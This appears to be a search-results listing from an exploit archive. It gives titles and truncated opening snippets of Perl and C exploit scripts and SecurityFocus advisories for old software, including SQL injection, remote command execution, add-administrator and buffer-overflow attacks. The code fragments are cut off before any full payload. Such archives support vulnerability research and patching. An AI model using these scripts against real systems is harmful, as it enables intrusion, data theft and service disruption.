1086 matches found
Exjune Guestbook 2.0 - Remote Database Disclosure Exploit
No description provided by source. !/usr/bin/perl By AlpHaNiX NullArea.Net alphaathacker.bz Made in Tunisia script : Exjune Guestbook v2 download : http://www.exjune.com/downloads/downloads/exJuneguestbook.asp Vulnerable : database path : /admin/exdb.mdb Real Life Example : ...
Fishyshoop <= 0.930b Remote Add Administrator Account Exploit
No description provided by source. !/usr/bin/perl James Gray [email protected] Fishyshoop Security Vulnerability use WWW::Curl::Easy; sub usage print $0 Fishyshoop root URL Desired E-Mail Desired Password\n; exit; $FSURL=shift or usage; $UNAME=shift or usage; $PASS=shift or usage; my $fishyshoop...
AWStats (6.0-6.2) configdir Remote Command Execution Exploit (c code)
No description provided by source. / AwStats exploit by Thunder, [email protected] This exploit makes use of the remote command execution bug discovered in AwStats ver 6.2 and below. The bug resides in the awstats.pl perl script. The script does not sanitise correctly the user input for the...
Teamtek Universal FTP Server Multiple Commands Remote Denial of Service Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/21085/info Universal FTP Server is prone to multiple remote denial-of-service vulnerabilities because the application fails to handle exceptional conditions. An attacker can exploit these issues to crash the affected...
Annuaire 1Two 2.2 - Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl Affected.scr..: Annuaire 1Two 2.2 Poc.ID........: 09060902.txt Type..........: SQL Injection without quote Risk.level....: Medium Vendor.Status.: Unpatched Src.download..: http://www.1two.org/ Poc.link......: acid-root.new.fr/poc/09060902.txt...
Invision Power Board 2.0.0 - 2.0.2 - SQL Injection Exploit
No description provided by source. !/usr/bin/perl use IO::Socket;...
BL4 SMTP Server < 0.1.5 - Remote Buffer Overflow PoC
No description provided by source. !/usr/bin/perl use IO::Socket; use Socket; my$socket = ; if$ARGV 1 | $ARGV 2 usage if$ARGV 2 $prt = $ARGV1 else $prt = 25 ; $adr = $ARGV0; $prt = $ARGV1; $socket = IO::Socket::INET-newProto=tcp, PeerAddr=$adr, PeerPort=$prt, Reuse=1 or die Error: cant connect to...
MyBB Member.PHP SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/14684/info MyBB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. Successful exploitation could result in a compromise of the...
Novell NetIQ Privileged User Manager 2.3.1 ldapagnt.dll ldapagnt_eval() Perl Code Evaluation RCE
No description provided by source. Novell NetIQ Privileged User Manager 2.3.1 ldapagnt.dll ldapagnteval Perl Code Evaluation RCE pre auth/SYSTEM Tested against: Microsoft Windows 2003 r2 sp2 download url: http://download.novell.com/index.jsp search Privileged User Manager file tested:...
Borland Interbase <= 7.x Remote Exploit
No description provided by source. !/usr/bin/perl Priv8security com remote exploit for Borland Interbase 7.1 SP 2 and lower Public Version!!! Bug found by Aviram Jenik www.securiteam.com unixfocus 5AP0P0UCUO.html wsxz@localhost buffer$ perl priv8ibserverb.pl -h localhost -t 0 -= Priv8security.com...
Envolution <= 1.1.0 (topic) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl use LWP::UserAgent; use HTTP::Cookies; if@ARGV 3 usage; exit; $site = $ARGV0; Site Target $path = $ARGV1; Path direktori envolution1-0-1 $usid = $ARGV2; member id $www = new LWP::UserAgent; $sql =...
PHP-Nuke KutubiSitte Module - 'kid' Parameter SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/28126/info The KutubiSitte module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an...
YapBB <= 1.2 (cfgIncludeDirectory) Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl YapBB =1.2 Beta Remote Command Execution Exploit Copyright c 2006 cijfer cijfer@netti!fi All rights reserved. never ctrl+c again. cijfer$ http://target.com/dir host changed to 'http://target.com/dir' cijfer$ to set your PHP shell location: cijfer$...
Cisco Aironet AP1x00 Malformed HTTP GET Denial of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8290/info Cisco Aironet AP1x00 series devices are prone to a denial of service vulnerability upon receipt of a malformed HTTP GET request. Such a request will cause the device to reload. !/usr/bin/perl Cisco Global...
SturGeoN Upload Arbitrary File Upload Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/18764/info SturGeoN Upload is prone to an arbitrary file-upload vulnerability. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitat...
Daniel Beckham The Finger Server 0.82 BETA Pipe Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/974/info 'The Finger Server' is a perl script for providing .plan-like functionality through a website. Due to insufficient input checking it is possible for remote unauthenticated users to execute shell commands on the...
Crux Gallery <= 1.32 Insecure Cookie Handling Vulnerability
No description provided by source. Crux Gallery = 1.32 / Insecure Cookie Handling Vulnerability Program: Crux Gallery Version: = 1,32 File affected: admin/ Download:...
My Gaming Ladder Combo System <= 7.0 - Remote Code Execution Exploit
No description provided by source. !/usr/bin/perl Method found & Exploit scripted by nukedx Contacts ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com Original advisory: http://www.nukedx.com/?viewdoc=28 Usage: ladder.pl host path cmd Dork: Ladder Scripts by http://www.mygamingladder.com...
WM Downloader 3.0.0.9 - PLS WMDownloader (PoC)
No description provided by source. !/usr/bin/perl JIKO =JAWAD Thanx To All Friends : Cyber-Zone , Stack , ZoRLu , Hussin X , Mag!c ompo ,Sad Hacker ,Strock ... All MoroCCaN HaCkerS No-Exploit.com EAX 00000000 ECX 41414141 EDX 000008C3 EBX 000FBBD4 ASCII F:\perso\test\tool\jiko.pls ESP 000F7298 EB...
AT-TFTP <= 1.9 (Long Filename) Remote Buffer Overflow Exploit
No description provided by source. !/usr/bin/perl -w acaroatjervus.it http://www.securityfocus.com/bid/21320 [email protected] is credited with the discovery of this vulnerability use IO::Socket; if!$ARGV1 print Uso: atftp-19.pl victim port\n\n; exit; $victim = IO::Socket::INET-newProto='udp',...